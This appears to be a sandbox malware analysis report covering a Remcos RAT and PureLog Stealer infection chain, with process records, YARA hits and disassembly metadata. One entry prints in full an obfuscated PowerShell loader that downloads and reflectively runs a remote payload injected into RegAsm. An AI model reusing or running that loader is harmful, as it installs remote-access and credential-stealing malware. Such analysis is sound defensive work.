                                                Start time:12:50:09
                                                Start date:25/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:9
                                                Start time:12:50:10
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                                                Imagebase:0xfb0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:12:50:18
                                                Start date:25/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                Imagebase:0x6b0000
                                                File size:65'440 bytes
                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:high
                                                Has exited:false

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000003.2063389705.00000000063F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_3_63f0000_mshta.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction ID: 60420a577889b31d5509410d28ab386f35695eabf46adf4eb3e8584f263e1b00
                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction Fuzzy Hash:

                                                  Execution Graph

                                                  Execution Coverage:2.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:10.3%
                                                  Total number of Nodes:29
                                                  Total number of Limit Nodes:2
                                                  execution_graph 12305 3747480 12306 37474be 12305->12306 12307 374764b 12306->12307 12313 3747c45 12306->12313 12317 3747da8 12306->12317 12321 3747a18 12306->12321 12325 37479f7 12306->12325 12308 37475df 12314 3747b9a 12313->12314 12315 3747d57 12314->12315 12329 7dc464f 12314->12329 12318 3747cf9 12317->12318 12320 7dc464f 2 API calls 12318->12320 12319 3747d57 12320->12319 12322 3747a4c 12321->12322 12323 3747b30 12322->12323 12324 7dc464f 2 API calls 12322->12324 12323->12308 12324->12323 12327 3747a4c 12325->12327 12326 3747b30 12326->12308 12327->12326 12328 7dc464f 2 API calls 12327->12328 12328->12326 12331 7dc465e 12329->12331 12330 7dc4a93 12330->12315 12331->12330 12335 3747e00 12331->12335 12339 3747dff 12331->12339 12332 7dc4a34 12332->12315 12336 3747e4b URLDownloadToFileW 12335->12336 12338 3747ea8 12336->12338 12338->12332 12340 3747e4b URLDownloadToFileW 12339->12340 12342 3747ea8 12340->12342 12342->12332

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 519 3747e00-3747e52 521 3747e54-3747e5a 519->521 522 3747e5d-3747e63 519->522 521->522 523 3747e65-3747e6e 522->523 524 3747e71-3747ea6 URLDownloadToFileW 522->524 523->524 525 3747eaf-3747ec3 524->525 526 3747ea8-3747eae 524->526 526->525
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,?), ref: 03747E99
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2168712340.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_3740000_powershell.jbxd
                                                  Similarity
                                                  • API ID: DownloadFile
                                                  • String ID:
                                                  • API String ID: 1407266417-0
                                                  • Opcode ID: 531db28c5bf762f6fa063590f8f29a138adcbdaf243945da1ca944d416a00428
                                                  • Instruction ID: 394f7652a0bdba921f89d81103d43f695d43ef8eb5835612ef0608cc196909cf
                                                  • Opcode Fuzzy Hash: 531db28c5bf762f6fa063590f8f29a138adcbdaf243945da1ca944d416a00428
                                                  • Instruction Fuzzy Hash: 9921F6B5D01259DFCB04CF9AD984ADEFBB4FF48310F14852AE928A7210D375A954CFA4

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 207 7dc464f-7dc4663 209 7dc4665-7dc4671 207->209 210 7dc4673 207->210 211 7dc4675-7dc4677 209->211 210->211 212 7dc467d-7dc4687 211->212 213 7dc4a93-7dc4a9d 211->213 214 7dc468d-7dc4692 212->214 215 7dc4af2-7dc4b13 212->215 216 7dc4a9f-7dc4aa8 213->216 217 7dc4aab-7dc4ab1 213->217 218 7dc46aa-7dc46b8 214->218 219 7dc4694-7dc469a 214->219 220 7dc4ab7-7dc4ac3 217->220 221 7dc4ab3-7dc4ab5 217->221 218->213 230 7dc46b9-7dc46c1 218->230 222 7dc469c 219->222 223 7dc469e-7dc46a9 219->223 224 7dc4ac5-7dc4aef 220->224 221->224 222->218 223->218 231 7dc472c-7dc473e 230->231 232 7dc46c3-7dc46dd 230->232 234 7dc4744-7dc476b 231->234 235 7dc47c6-7dc4815 231->235 232->213 242 7dc46e3-7dc46ed 232->242 244 7dc476d-7dc4773 234->244 245 7dc4785-7dc47b3 234->245 263 7dc481c-7dc482f 235->263 242->215 243 7dc46f3-7dc46f8 242->243 248 7dc46fa-7dc4700 243->248 249 7dc4710-7dc4714 243->249 246 7dc4775 244->246 247 7dc4777-7dc4783 244->247 261 7dc47b5-7dc47b7 245->261 262 7dc47c1-7dc47c4 245->262 246->245 247->245 251 7dc4704-7dc470e 248->251 252 7dc4702 248->252 249->213 254 7dc471a-7dc471e 249->254 251->249 252->249 254->213 257 7dc4724-7dc4728 254->257 257->213 257->231 261->262 262->263 264 7dc4835-7dc485c 263->264 265 7dc48b7-7dc4906 263->265 270 7dc485e-7dc4864 264->270 271 7dc4876-7dc48a4 264->271 282 7dc490d-7dc4920 265->282 273 7dc4868-7dc4874 270->273 274 7dc4866 270->274 280 7dc48a6-7dc48a8 271->280 281 7dc48b2-7dc48b5 271->281 273->271 274->271 280->281 281->282 283 7dc49a8-7dc49f7 282->283 284 7dc4926-7dc494d 282->284 301 7dc49fe-7dc4a2c 283->301 289 7dc494f-7dc4955 284->289 290 7dc4967-7dc4995 284->290 292 7dc4959-7dc4965 289->292 293 7dc4957 289->293 299 7dc4997-7dc4999 290->299 300 7dc49a3-7dc49a6 290->300 292->290 293->290 299->300 300->301 306 7dc4a2f call 3747e00 301->306 307 7dc4a2f call 3747dff 301->307 304 7dc4a34-7dc4a90 306->304 307->304
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tP]q$tP]q
                                                  • API String ID: 0-145478062
                                                  • Opcode ID: a98b171dd0fc7a0305096dd9e99becb977806d557212629eafa8fbbbcef9ce62
                                                  • Instruction ID: 4cc41ce008d98ef2975b49df51ae64e1fa3cfe08e2aa7a42059d447ec313119f
                                                  • Opcode Fuzzy Hash: a98b171dd0fc7a0305096dd9e99becb977806d557212629eafa8fbbbcef9ce62
                                                  • Instruction Fuzzy Hash: E3D116707002469FCB14CF68C560A6EFFE2EF89710F69856EE9419B394DA72DC41CBA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 528 3747dff-3747e52 530 3747e54-3747e5a 528->530 531 3747e5d-3747e63 528->531 530->531 532 3747e65-3747e6e 531->532 533 3747e71-3747ea6 URLDownloadToFileW 531->533 532->533 534 3747eaf-3747ec3 533->534 535 3747ea8-3747eae 533->535 535->534
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,?), ref: 03747E99
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2168712340.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_3740000_powershell.jbxd
                                                  Similarity
                                                  • API ID: DownloadFile
                                                  • String ID:
                                                  • API String ID: 1407266417-0
                                                  • Opcode ID: d5e2d3a979cfe45653022726924e42443c91c9bb8b83333843cb3d00f62cf0b9
                                                  • Instruction ID: 282e05faf9bce4063efb6f875e054b79cc4c316d8ee3b633700887413b7ea397
                                                  • Opcode Fuzzy Hash: d5e2d3a979cfe45653022726924e42443c91c9bb8b83333843cb3d00f62cf0b9
                                                  • Instruction Fuzzy Hash: EC2105B5D01259DFCB04CF99D984ADEFBB4FF48310F14852AE928A7210D374AA54CFA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 785 7dc1fd0-7dc1fd3 786 7dc203e-7dc2044 785->786 787 7dc1fd5-7dc1fe1 785->787 788 7dc2108-7dc2112 786->788 789 7dc2045-7dc204d 786->789 787->788 795 7dc1fe7-7dc1fee 787->795 793 7dc2114-7dc211d 788->793 794 7dc2120-7dc2126 788->794 791 7dc204f-7dc2056 789->791 792 7dc20b8-7dc20c0 789->792 798 7dc2060-7dc206f 791->798 808 7dc20fc-7dc2105 792->808 799 7dc212c-7dc2138 794->799 800 7dc2128-7dc212a 794->800 796 7dc2158-7dc217b 795->796 797 7dc1ff4-7dc1ff9 795->797 803 7dc1ffb-7dc2001 797->803 804 7dc2011-7dc2020 797->804 798->788 813 7dc2075-7dc207c 798->813 801 7dc213a-7dc2155 799->801 800->801 809 7dc2005-7dc200f 803->809 810 7dc2003 803->810 804->788 814 7dc2026-7dc2044 804->814 809->804 810->804 816 7dc207e-7dc2099 813->816 817 7dc20c2-7dc20f5 813->817 814->788 829 7dc204a-7dc2056 814->829 822 7dc209b-7dc20a1 816->822 823 7dc20b3-7dc20b7 816->823 817->808 824 7dc20a5-7dc20b1 822->824 825 7dc20a3 822->825 828 7dc20be-7dc20c0 823->828 824->823 825->823 828->808 829->798
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ffa8e1a41cb6670e0a897025b5875df16a826c8e0799af659742631b6f78ef30
                                                  • Instruction ID: ba952a7c9a100e3985ea9fc706b9f730c760927d4865cc93b7280bc0f3720556
                                                  • Opcode Fuzzy Hash: ffa8e1a41cb6670e0a897025b5875df16a826c8e0799af659742631b6f78ef30
                                                  • Instruction Fuzzy Hash: BF4168B07083528FDB16DB688950669FBA2AFD2314B6480AEC641DF356CB36DD05C7B2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 954 7dc05f0-7dc05fd 955 7dc05ff-7dc063e 954->955 956 7dc066b-7dc0675 954->956 967 7dc06bb-7dc06c0 955->967 968 7dc0640-7dc064e 955->968 957 7dc0677-7dc067d 956->957 958 7dc0680-7dc0686 956->958 959 7dc068c-7dc0698 958->959 960 7dc0688-7dc068a 958->960 962 7dc069a-7dc06b8 959->962 960->962 967->968 972 7dc0656-7dc0665 968->972 972->956
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd516ccc54e5c1110da998b396750268872605b15a6c1042a075c03f55dca873
                                                  • Instruction ID: 8ca4ea949b3da6e24e526a42ee4506cff1fbb39c6945fbb3ccb1d00373e2d5fe
                                                  • Opcode Fuzzy Hash: bd516ccc54e5c1110da998b396750268872605b15a6c1042a075c03f55dca873
                                                  • Instruction Fuzzy Hash: 171106B1344315ABD624DA7D9811B3EB7D6EBC5B11F60C42EE649CB380DD72DC4183A1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c0a8083782cf32bda4d5dd46ee9e13f85d78b4de0c1f685d8f710307cc51337
                                                  • Instruction ID: 4b16b8968684437e60192e905ca6cce402453ba1ec637870282e3ad4e9669c0e
                                                  • Opcode Fuzzy Hash: 1c0a8083782cf32bda4d5dd46ee9e13f85d78b4de0c1f685d8f710307cc51337
                                                  • Instruction Fuzzy Hash: EB11B7B0708202CFDB14DB54C941AADB762BF91754F6580AEC600AF355CB72ED41D771
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 237d0c51dcc255441f47a5473d96d8bc886a962e04675a0cc7c447dab049e018
                                                  • Instruction ID: 4e90ccbf0fb1e5b74fac8e0bac9bf8906fc8e2d16d51921146e3cd7fe4e789be
                                                  • Opcode Fuzzy Hash: 237d0c51dcc255441f47a5473d96d8bc886a962e04675a0cc7c447dab049e018
                                                  • Instruction Fuzzy Hash: C90147B57443057BD7248A6E8901F2EB6D2AFC4B10F64C82AEA48EF3C0E9729C4043B1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2165884770.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_34fd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbd123fbed454e94e9193162bee241c42e307d16f68bf364f04efcd39c035ce2
                                                  • Instruction ID: 3bf68932ead93bcc282f7ab83aa70c9935da7be606970e33b87c64704ee8923c
                                                  • Opcode Fuzzy Hash: dbd123fbed454e94e9193162bee241c42e307d16f68bf364f04efcd39c035ce2
                                                  • Instruction Fuzzy Hash: 6701847140D3C09FD7128B25C894752BFB4DF43224F0D84DBD9848F2A7C2695848C776
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2165884770.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_34fd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65fb7558850be87c09b88b348468f0d399f6f492b8d54812568ea08de0fdc50d
                                                  • Instruction ID: 7339a550ee741afc0961d96f76d77e3b751312cf2c1e3fc5dbd7e3333b143e70
                                                  • Opcode Fuzzy Hash: 65fb7558850be87c09b88b348468f0d399f6f492b8d54812568ea08de0fdc50d
                                                  • Instruction Fuzzy Hash: D001B171804300AEE7208A15C984B67BF98EF46228F1CC56BEE580E24AC2799846C6B9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2168712340.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_3740000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e17684e39c77ce59a5eea3af2f312af1ce0858a606b67c2307696f5be939dda
                                                  • Instruction ID: d1d9c85430b9e7055d57ba02a29013563dc9b1de8acbff11b2573dff162e3d2a
                                                  • Opcode Fuzzy Hash: 2e17684e39c77ce59a5eea3af2f312af1ce0858a606b67c2307696f5be939dda
                                                  • Instruction Fuzzy Hash: 8E31C40644E7E11FD303A37869BA5C5BF70AE53064B0E46DBD0C18F1A3E6484A0EC3B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q
                                                  • API String ID: 0-3647279530
                                                  • Opcode ID: e8436096cde9d9424e7f35c13e3eef16250e8474102d30e806e1113a77c169a3
                                                  • Instruction ID: ebf056d2cc65b5c5b0b5467c15e48e0103fd2e44f400a912bfcd71368a476cb6
                                                  • Opcode Fuzzy Hash: e8436096cde9d9424e7f35c13e3eef16250e8474102d30e806e1113a77c169a3
                                                  • Instruction Fuzzy Hash: 5DF137F170836B8FDB25CB6888117AAFBB5AF82315F24847FD545CB252DA36C841C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$4']q$4']q
                                                  • API String ID: 0-1785108022
                                                  • Opcode ID: 6ff2745dcfd8da9f43c2400ee87f23a495142ffea62b10c835bcf724d91438e1
                                                  • Instruction ID: ca34851bfeb2f618c8f3f54756eca7bf5456882ffe30032158575063564b9e9a
                                                  • Opcode Fuzzy Hash: 6ff2745dcfd8da9f43c2400ee87f23a495142ffea62b10c835bcf724d91438e1
                                                  • Instruction Fuzzy Hash: 9981F1B0B08246CFCB15DB68D4506AAFFF9AF86210F18C5AED485CB256DA35C845C7A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: bf8bc88bc7180da0cb04491e97b261eb3c9fe2ac8a39d770929a5e9cf702079e
                                                  • Instruction ID: 543d1636bc80b48ad5d95e22baf16c7754aa69f3c5042b2cba10581c045dffa0
                                                  • Opcode Fuzzy Hash: bf8bc88bc7180da0cb04491e97b261eb3c9fe2ac8a39d770929a5e9cf702079e
                                                  • Instruction Fuzzy Hash: E32135B17642075BDB28DA6E9840B36FEEA9BC1715F60C43EDA45CB381DD36C8018362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q
                                                  • API String ID: 0-978391646
                                                  • Opcode ID: c9ca58520c68e1394290cac53d995929ed77bcde98e34b33700d451e3cff8b47
                                                  • Instruction ID: 641d7d8101a8358b51c4b6c200095828afaa788475b419ba316544bf465e302b
                                                  • Opcode Fuzzy Hash: c9ca58520c68e1394290cac53d995929ed77bcde98e34b33700d451e3cff8b47
                                                  • Instruction Fuzzy Hash: B101D620B0D3868FD72E832C1C71125AFB66F8295076A44EBC2C1EB297CE598C04C396
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2291054337.0000000004C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4c6d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d31f70a23c11ec1d5c40aa448f782f690a6cc8b2aa8fafcf8d7f8f3d7009208
                                                  • Instruction ID: 5834e168a4906d4d5530a6f172067be4377ef6486f1cf86b7c3e51f5ef671be0
                                                  • Opcode Fuzzy Hash: 4d31f70a23c11ec1d5c40aa448f782f690a6cc8b2aa8fafcf8d7f8f3d7009208
                                                  • Instruction Fuzzy Hash: 2B014C6110E3C09FE7128B259894B52BFB8EF43224F19C1DBD9898F2A3C2695849C772
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2291054337.0000000004C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4c6d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5d4b0ff3a63010c9c19ee3392a27da8ce267daf3554da6d36b7923857e6137f
                                                  • Instruction ID: ef73a3e1de3bb5dc44fe762dc739de48efa61ceae7154a989b3f10c62b312eee
                                                  • Opcode Fuzzy Hash: f5d4b0ff3a63010c9c19ee3392a27da8ce267daf3554da6d36b7923857e6137f
                                                  • Instruction Fuzzy Hash: F1012B31204340DAE7208E16DDC4B67FF9CEF86320F1CC52AED4B0B246C679A941CAB5
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2291695937.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d80000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a13a30c79266fc4ac7a681b100432e2c425063dfa8b53e6ea73d2f7d6922ed4
                                                  • Instruction ID: d183bb95678c9dba149afd87f16cd888689454a62c4cafb07d146c4236cab7a2
                                                  • Opcode Fuzzy Hash: 1a13a30c79266fc4ac7a681b100432e2c425063dfa8b53e6ea73d2f7d6922ed4
                                                  • Instruction Fuzzy Hash: 88F0D435A001099FCB15CF9DD990AEEF7B5FF88324F208159E519A72A1C732EC62CB60

                                                  Execution Graph

                                                  Execution Coverage: 8.1%
                                                  Dynamic/Decrypted Code Coverage: 0%
                                                  Signature Coverage: 0%
                                                  Total number of Nodes: 337
                                                  Total number of Limit Nodes: 42
                                                  execution_graph: serialized node and edge data behind the Execution Graph visualization (not reproduced here). Windows API calls named in the graph nodes: CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread.

                                                  Control-flow Graph

                                                  control_flow_graph: serialized basic-block and edge data behind the Control-flow Graph visualization (executed/not-executed colouring not reproduced here). Blocks span 4ae6188-4ae64e6, with calls to 4ae5334, 4aef0df and 4aef1d8.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SjP
                                                  • API String ID: 0-1466192239
                                                  • Opcode ID: dd5c5d832102b0d61786b9f29959d6e83a45ba1c75a1f9ea37b109858f3fbf6e
                                                  • Instruction ID: 402b72d93890575a2d0a37102ccd3c3fdc69ac429a2d58dfde8c243527c0012b
                                                  • Opcode Fuzzy Hash: dd5c5d832102b0d61786b9f29959d6e83a45ba1c75a1f9ea37b109858f3fbf6e
                                                  • Instruction Fuzzy Hash: 6AA112B4E05208DFDB04DFA9D499AAEBBF2FF88300F14802AD525AB395DB755945CF80

                                                  Control-flow Graph

